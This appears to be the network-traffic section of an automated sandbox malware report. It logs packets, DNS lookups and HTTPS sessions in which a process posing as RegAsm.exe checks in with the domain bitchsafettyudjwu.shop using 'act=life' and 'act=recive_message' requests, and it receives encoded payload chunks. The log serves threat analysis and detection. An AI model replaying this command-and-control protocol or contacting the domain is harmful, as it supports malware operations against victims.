          Jul 4, 2024 21:48:56.541209936 CEST44349730104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:56.541322947 CEST44349730104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:56.541368961 CEST49730443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:56.543469906 CEST49730443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:56.543487072 CEST44349730104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:56.543524027 CEST49730443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:56.543529987 CEST44349730104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:56.546849966 CEST49732443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:56.546870947 CEST44349732104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:56.546936035 CEST49732443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:56.547553062 CEST49732443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:56.547561884 CEST44349732104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:57.029202938 CEST44349732104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:57.029278994 CEST49732443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:57.030998945 CEST49732443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:57.031006098 CEST44349732104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:57.031254053 CEST44349732104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:57.032401085 CEST49732443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:57.032421112 CEST49732443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:57.032469988 CEST44349732104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:57.527528048 CEST44349732104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:57.527587891 CEST44349732104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:57.527618885 CEST44349732104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:57.527653933 CEST44349732104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:57.527719021 CEST49732443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:57.527740002 CEST44349732104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:57.527749062 CEST49732443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:57.527920961 CEST44349732104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:57.527961969 CEST44349732104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:57.527970076 CEST49732443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:57.527981997 CEST44349732104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:57.528021097 CEST49732443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:57.528023005 CEST44349732104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:57.528037071 CEST44349732104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:57.528084993 CEST49732443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:57.528090954 CEST44349732104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:57.532202959 CEST44349732104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:57.532255888 CEST49732443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:57.532258034 CEST44349732104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:57.532272100 CEST44349732104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:57.532313108 CEST49732443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:57.532485962 CEST44349732104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:57.532563925 CEST44349732104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:57.532596111 CEST44349732104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:57.532605886 CEST49732443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:57.532620907 CEST44349732104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:57.532685041 CEST49732443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:57.532686949 CEST44349732104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:57.532737017 CEST49732443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:57.532849073 CEST49732443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:57.532862902 CEST44349732104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:57.532876015 CEST49732443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:57.532881975 CEST44349732104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:57.573395967 CEST49734443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:57.573427916 CEST44349734104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:57.573517084 CEST49734443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:57.573837042 CEST49734443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:57.573844910 CEST44349734104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:58.049772978 CEST44349734104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:58.049868107 CEST49734443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:58.051124096 CEST49734443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:58.051130056 CEST44349734104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:58.051347971 CEST44349734104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:58.058393955 CEST49734443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:58.058549881 CEST49734443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:58.058572054 CEST44349734104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:58.058634996 CEST49734443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:58.058643103 CEST44349734104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:58.550507069 CEST44349734104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:58.550601959 CEST44349734104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:58.550774097 CEST49734443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:58.550925016 CEST49734443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:58.550940037 CEST44349734104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:58.571229935 CEST49737443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:58.571269989 CEST44349737104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:58.571412086 CEST49737443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:58.571758986 CEST49737443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:58.571767092 CEST44349737104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:59.042278051 CEST44349737104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:59.042372942 CEST49737443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:59.043816090 CEST49737443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:59.043822050 CEST44349737104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:59.044049025 CEST44349737104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:59.045274973 CEST49737443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:59.045408010 CEST49737443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:59.045427084 CEST44349737104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:59.505090952 CEST44349737104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:59.505194902 CEST44349737104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:59.505314112 CEST49737443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:59.505625010 CEST49737443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:59.505640030 CEST44349737104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:59.595763922 CEST49739443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:59.595804930 CEST44349739104.21.27.50192.168.2.4
          Jul 4, 2024 21:48:59.595901012 CEST49739443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:59.596349001 CEST49739443192.168.2.4104.21.27.50
          Jul 4, 2024 21:48:59.596362114 CEST44349739104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:00.076571941 CEST44349739104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:00.076641083 CEST49739443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:00.077991962 CEST49739443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:00.078006983 CEST44349739104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:00.078244925 CEST44349739104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:00.086294889 CEST49739443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:00.086467981 CEST49739443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:00.086504936 CEST44349739104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:00.086569071 CEST49739443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:00.086581945 CEST44349739104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:00.622426987 CEST44349739104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:00.622517109 CEST44349739104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:00.622586012 CEST49739443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:00.622673035 CEST49739443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:00.622684956 CEST44349739104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:00.720819950 CEST49741443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:00.720849037 CEST44349741104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:00.721019030 CEST49741443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:00.721307039 CEST49741443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:00.721316099 CEST44349741104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:01.202503920 CEST44349741104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:01.202636003 CEST49741443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:01.204106092 CEST49741443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:01.204113007 CEST44349741104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:01.204360008 CEST44349741104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:01.214482069 CEST49741443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:01.214601040 CEST49741443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:01.214637041 CEST44349741104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:01.593481064 CEST44349741104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:01.593574047 CEST44349741104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:01.593628883 CEST49741443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:01.593806028 CEST49741443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:01.593817949 CEST44349741104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:01.819303036 CEST49743443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:01.819343090 CEST44349743104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:01.819403887 CEST49743443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:01.819725990 CEST49743443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:01.819737911 CEST44349743104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:02.312637091 CEST44349743104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:02.312818050 CEST49743443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:02.313865900 CEST49743443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:02.313873053 CEST44349743104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:02.314101934 CEST44349743104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:02.315193892 CEST49743443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:02.315284014 CEST49743443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:02.315290928 CEST44349743104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:03.467730045 CEST44349743104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:03.467855930 CEST44349743104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:03.467910051 CEST49743443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:03.468022108 CEST49743443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:03.468036890 CEST44349743104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:03.809130907 CEST49746443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:03.809170008 CEST44349746104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:03.809250116 CEST49746443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:03.809614897 CEST49746443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:03.809632063 CEST44349746104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:04.295015097 CEST44349746104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:04.295101881 CEST49746443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:04.296324015 CEST49746443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:04.296334028 CEST44349746104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:04.296641111 CEST44349746104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:04.297826052 CEST49746443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:04.298618078 CEST49746443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:04.298654079 CEST44349746104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:04.298754930 CEST49746443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:04.298815012 CEST44349746104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:04.298943043 CEST49746443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:04.298978090 CEST44349746104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:04.299125910 CEST49746443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:04.299154043 CEST44349746104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:04.299309015 CEST49746443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:04.299344063 CEST44349746104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:04.299541950 CEST49746443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:04.299571037 CEST44349746104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:04.299585104 CEST49746443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:04.299603939 CEST44349746104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:04.299752951 CEST49746443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:04.299781084 CEST44349746104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:04.299806118 CEST49746443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:04.299951077 CEST49746443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:04.299981117 CEST49746443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:04.308917999 CEST44349746104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:04.309132099 CEST49746443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:04.309161901 CEST44349746104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:04.309190989 CEST49746443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:04.309206009 CEST44349746104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:04.309247971 CEST49746443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:04.313684940 CEST44349746104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:07.046963930 CEST44349746104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:07.047055960 CEST44349746104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:07.047120094 CEST49746443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:07.047276974 CEST49746443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:07.047292948 CEST44349746104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:07.049734116 CEST49749443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:07.049777985 CEST44349749104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:07.049864054 CEST49749443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:07.050462961 CEST49749443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:07.050473928 CEST44349749104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:07.530997038 CEST44349749104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:07.531086922 CEST49749443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:07.532799959 CEST49749443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:07.532810926 CEST44349749104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:07.533041954 CEST44349749104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:07.534487963 CEST49749443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:07.534513950 CEST49749443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:07.534554005 CEST44349749104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:07.956258059 CEST44349749104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:07.956358910 CEST44349749104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:07.956422091 CEST49749443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:07.956666946 CEST49749443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:07.956681967 CEST44349749104.21.27.50192.168.2.4
          Jul 4, 2024 21:49:07.956712961 CEST49749443192.168.2.4104.21.27.50
          Jul 4, 2024 21:49:07.956717014 CEST44349749104.21.27.50192.168.2.4
          TimestampSource PortDest PortSource IPDest IP
          Jul 4, 2024 21:48:55.279320002 CEST5245453192.168.2.41.1.1.1
          Jul 4, 2024 21:48:55.295074940 CEST53524541.1.1.1192.168.2.4
          Jul 4, 2024 21:49:27.735131979 CEST5350150162.159.36.2192.168.2.4
          Jul 4, 2024 21:49:28.220741034 CEST5374753192.168.2.41.1.1.1
          Jul 4, 2024 21:49:28.230101109 CEST53537471.1.1.1192.168.2.4
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Jul 4, 2024 21:48:55.279320002 CEST192.168.2.41.1.1.10xb772Standard query (0)bitchsafettyudjwu.shopA (IP address)IN (0x0001)false
          Jul 4, 2024 21:49:28.220741034 CEST192.168.2.41.1.1.10x8538Standard query (0)206.23.85.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Jul 4, 2024 21:48:55.295074940 CEST1.1.1.1192.168.2.40xb772No error (0)bitchsafettyudjwu.shop104.21.27.50A (IP address)IN (0x0001)false
          Jul 4, 2024 21:48:55.295074940 CEST1.1.1.1192.168.2.40xb772No error (0)bitchsafettyudjwu.shop172.67.168.236A (IP address)IN (0x0001)false
          Jul 4, 2024 21:49:28.230101109 CEST1.1.1.1192.168.2.40x8538Name error (3)206.23.85.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
          • bitchsafettyudjwu.shop
          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.449730104.21.27.504437560C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          TimestampBytes transferredDirectionData
          2024-07-04 19:48:55 UTC269OUTPOST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 8
          Host: bitchsafettyudjwu.shop
          2024-07-04 19:48:55 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
          Data Ascii: act=life
          2024-07-04 19:48:56 UTC810INHTTP/1.1 200 OK
          Date: Thu, 04 Jul 2024 19:48:56 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          Set-Cookie: PHPSESSID=rvt94tcqmb1e22gpashk8pshhf; expires=Mon, 28-Oct-2024 13:35:35 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AZCbsIHmkP%2BZSEhilJ8J16HyKdLsyOFpZdcsqVMAZNFspqDdh7oByJBz3lucAn%2BlIChPnyB4RjQqx4%2BThBbi%2FHLV29dg4Tajjcm2D9NsmeSv3BBUMvsiLj1298kl%2BGmdThKlcH9%2FjIum"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 89e1a2b98c0119ae-EWR
          alt-svc: h3=":443"; ma=86400
          2024-07-04 19:48:56 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
          Data Ascii: 2ok
          2024-07-04 19:48:56 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          1192.168.2.449732104.21.27.504437560C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          TimestampBytes transferredDirectionData
          2024-07-04 19:48:57 UTC270OUTPOST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 51
          Host: bitchsafettyudjwu.shop
          2024-07-04 19:48:57 UTC51OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 40 53 45 46 59 41 4c 55 56 26 6a 3d
          Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--@SEFYALUV&j=
          2024-07-04 19:48:57 UTC812INHTTP/1.1 200 OK
          Date: Thu, 04 Jul 2024 19:48:57 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          Set-Cookie: PHPSESSID=hus5kijk2q87hohbd3g3u337g9; expires=Mon, 28-Oct-2024 13:35:36 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u%2FxmnA0R9HZPwVIo%2FBU%2FwFqmyVmeLnPTcML8WQl%2BQjr6WaJf0lwuwuGM5Q41JCn3zWN4PV6FWIH6VaqZ3pDPFOKJ1ya7itmQyqk9qRZTU1C2B9p5%2B9U4Tw%2FuisKiGfunHFf5ys1%2B1kO1"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 89e1a2c0e9ae0cc2-EWR
          alt-svc: h3=":443"; ma=86400
          2024-07-04 19:48:57 UTC557INData Raw: 31 66 32 31 0d 0a 57 59 54 6f 50 67 72 45 38 63 4b 74 58 55 6f 63 4a 62 79 62 6b 38 35 72 6e 46 33 50 66 4a 55 31 65 49 30 6a 35 51 49 4f 30 5a 38 69 6a 75 45 63 66 4f 62 4c 34 70 6c 78 51 42 55 48 7a 2f 36 78 39 45 76 6f 4c 37 6f 5a 75 54 39 78 72 30 4b 42 49 44 54 78 2b 54 6a 6f 6d 31 73 6d 7a 76 6a 67 79 43 56 6f 4a 67 58 6e 6b 5a 72 48 45 4c 78 2f 71 68 4b 33 44 31 69 76 52 6f 39 67 62 37 33 39 4f 4f 2b 48 54 6d 61 6e 6d 61 37 4b 4e 53 39 2f 51 64 33 33 2f 71 73 4f 2b 54 79 6c 45 76 78 59 45 4f 41 42 79 53 49 73 74 4f 56 37 76 73 67 63 52 36 47 46 6f 2b 41 38 4f 58 63 48 6e 4f 61 2f 78 47 4b 56 4a 75 39 65 38 46 74 61 74 77 50 48 59 32 75 7a 38 7a 2f 67 67 31 5a 69 72 4a 57 68 79 54 63 36 64 55 50 55 38 2f 47 71 41 76 4d 33 76 78 44 7a 58 78 62 75 54
          Data Ascii: 1f21WYToPgrE8cKtXUocJbybk85rnF3PfJU1eI0j5QIO0Z8ijuEcfObL4plxQBUHz/6x9EvoL7oZuT9xr0KBIDTx+Tjom1smzvjgyCVoJgXnkZrHELx/qhK3D1ivRo9gb739OO+HTmanma7KNS9/Qd33/qsO+TylEvxYEOABySIstOV7vsgcR6GFo+A8OXcHnOa/xGKVJu9e8FtatwPHY2uz8z/gg1ZirJWhyTc6dUPU8/GqAvM3vxDzXxbuT
          2024-07-04 19:48:57 UTC1369INData Raw: 72 76 37 31 6a 70 4d 70 59 61 61 4b 53 70 4d 45 78 4c 48 4a 42 30 50 54 2b 71 67 50 2b 4f 4b 63 57 2f 31 59 58 35 45 36 48 5a 57 47 33 2b 7a 66 6e 6a 78 77 6d 35 4e 4f 6e 31 33 39 77 50 41 66 77 2f 76 4b 2b 53 38 73 38 6f 78 44 77 51 56 71 74 58 73 6b 49 42 39 6a 6b 65 61 61 4e 55 43 6a 2b 30 65 44 42 4f 69 64 73 52 73 7a 38 2f 37 34 46 2b 7a 6d 67 48 66 6c 58 48 2b 68 4d 69 57 5a 72 73 50 55 2f 35 34 52 51 59 71 57 58 6f 34 39 78 61 6a 35 41 78 72 6d 70 37 6b 6e 50 50 4b 6b 5a 35 56 51 55 72 77 4f 59 4c 67 54 59 6c 69 4b 6b 79 6c 74 6b 35 73 76 69 6a 7a 55 75 63 30 37 56 2f 76 6d 67 47 2f 55 77 72 68 66 77 55 52 44 73 53 59 31 6d 59 72 4c 36 50 75 47 59 55 6d 4f 72 6b 4b 72 4a 66 32 59 38 42 39 6e 68 73 66 52 4c 76 68 47 75 44 2b 46 6c 47 66 35 51 78 79
          Data Ascii: rv71jpMpYaaKSpMExLHJB0PT+qgP+OKcW/1YX5E6HZWG3+zfnjxwm5NOn139wPAfw/vK+S8s8oxDwQVqtXskIB9jkeaaNUCj+0eDBOidsRsz8/74F+zmgHflXH+hMiWZrsPU/54RQYqWXo49xaj5Axrmp7knPPKkZ5VQUrwOYLgTYliKkyltk5svijzUuc07V/vmgG/UwrhfwURDsSY1mYrL6PuGYUmOrkKrJf2Y8B9nhsfRLvhGuD+FlGf5Qxy
          2024-07-04 19:48:57 UTC1369INData Raw: 4e 4b 53 2f 58 32 61 6f 6c 4c 61 50 66 54 63 77 4c 37 57 53 36 4f 35 4a 2b 54 50 74 52 72 55 58 46 75 5a 42 6a 47 70 6f 73 2f 6f 32 34 34 6c 62 61 36 75 55 71 73 45 34 4c 48 4a 4f 30 2f 2f 78 71 77 33 37 4c 61 67 58 2b 31 74 61 6f 51 50 48 5a 33 54 7a 70 58 6d 6d 70 56 74 2b 70 62 79 6a 33 6a 5a 6f 50 46 69 51 6b 5a 72 48 45 4c 78 2f 71 68 4b 33 44 31 69 76 52 6f 4a 6f 5a 37 58 31 4f 2f 53 50 55 6d 4f 6e 6d 61 62 4f 4d 69 52 34 52 39 2f 35 39 36 41 4a 2b 54 69 2f 44 50 4a 52 43 4f 55 42 79 53 49 73 74 4f 56 37 76 73 67 63 58 72 61 45 73 64 6c 39 48 58 31 4a 30 50 37 6e 37 45 76 68 63 63 56 31 6e 45 35 59 72 30 61 4c 49 44 54 78 76 54 44 6d 68 6c 74 67 6f 4a 65 6f 77 44 41 68 62 45 62 53 39 2b 4f 72 43 66 63 78 6f 68 4c 2b 57 68 33 69 53 6f 31 74 61 4c 54
          Data Ascii: NKS/X2aolLaPfTcwL7WS6O5J+TPtRrUXFuZBjGpos/o244lba6uUqsE4LHJO0//xqw37LagX+1taoQPHZ3TzpXmmpVt+pbyj3jZoPFiQkZrHELx/qhK3D1ivRoJoZ7X1O/SPUmOnmabOMiR4R9/596AJ+Ti/DPJRCOUBySIstOV7vsgcXraEsdl9HX1J0P7n7EvhccV1nE5Yr0aLIDTxvTDmhltgoJeowDAhbEbS9+OrCfcxohL+Wh3iSo1taLT
          2024-07-04 19:48:57 UTC1369INData Raw: 46 4a 6d 72 35 36 6d 78 7a 67 6d 63 30 7a 59 38 76 61 72 44 2f 4d 33 6f 42 76 30 56 68 37 6c 55 34 52 72 5a 72 37 33 65 36 6a 49 48 47 2b 2b 30 2f 69 4e 66 77 39 79 62 73 37 69 34 37 70 4a 76 43 44 6a 64 70 77 38 41 36 30 42 67 47 77 73 36 37 39 37 35 59 56 56 5a 36 36 62 72 38 41 37 4a 6e 68 42 30 2f 7a 2b 70 68 76 32 4d 61 41 56 2b 46 77 49 37 30 79 44 62 47 69 37 39 6a 47 6d 78 42 34 6f 6f 59 76 67 6c 33 31 6f 53 30 72 52 2b 66 4b 36 53 62 77 67 34 33 61 63 50 41 4f 74 41 59 42 73 4c 4f 75 2f 65 2b 71 45 58 47 65 71 6e 36 76 48 50 69 52 77 51 4e 76 77 2b 61 51 62 2f 7a 75 6c 48 2f 6c 59 47 2b 74 45 67 6d 52 72 74 2f 73 30 70 73 51 65 4b 4b 47 4c 34 4a 64 39 61 46 46 67 36 37 76 51 6c 6b 6d 38 49 4f 4e 32 6e 44 77 44 72 51 47 41 62 43 7a 72 76 33 76 71
          Data Ascii: FJmr56mxzgmc0zY8varD/M3oBv0Vh7lU4RrZr73e6jIHG++0/iNfw9ybs7i47pJvCDjdpw8A60BgGws67975YVVZ66br8A7JnhB0/z+phv2MaAV+FwI70yDbGi79jGmxB4ooYvgl31oS0rR+fK6Sbwg43acPAOtAYBsLOu/e+qEXGeqn6vHPiRwQNvw+aQb/zulH/lYG+tEgmRrt/s0psQeKKGL4Jd9aFFg67vQlkm8ION2nDwDrQGAbCzrv3vq
